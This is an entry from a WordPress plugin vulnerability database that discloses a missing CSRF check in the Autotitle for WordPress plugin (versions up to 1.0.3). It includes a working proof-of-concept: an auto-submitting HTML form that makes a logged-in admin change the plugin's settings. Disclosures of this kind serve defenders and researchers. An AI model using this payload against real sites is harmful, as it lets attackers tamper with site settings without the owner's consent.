WordPress Plugin Vulnerabilities
Autotitle for WordPress <= 1.0.3 - Settings Update to Stored XSS via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.
Proof of Concept
<form action="https://example.com/wp-admin/options-general.php?page=autotitle-for-wordpress.php" method="POST"> <input type="text" name="publish_only" value="Y"> <input type="text" name="limit" value="3"> <input type="text" name="maxlimit" value="6"> <input type="text" name="stoppers" value="! ? . ,"> <input type="text" name="include_stopper" value="Y"> <input type="text" name="exclude_stopper" value=","> <input type="text" name="prefix" value="hacked"> <input type="text" name="postfix" value=""> <input type="text" name="do" value="Update"> </form> <script> document.forms[0].submit(); </script>
Affects Plugins
References
Classification
Type
CSRF
OWASP top 10
CWE
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-01-02 (about 4 months ago)
Added
2024-01-02 (about 4 months ago)
Last Updated
2024-01-02 (about 4 months ago)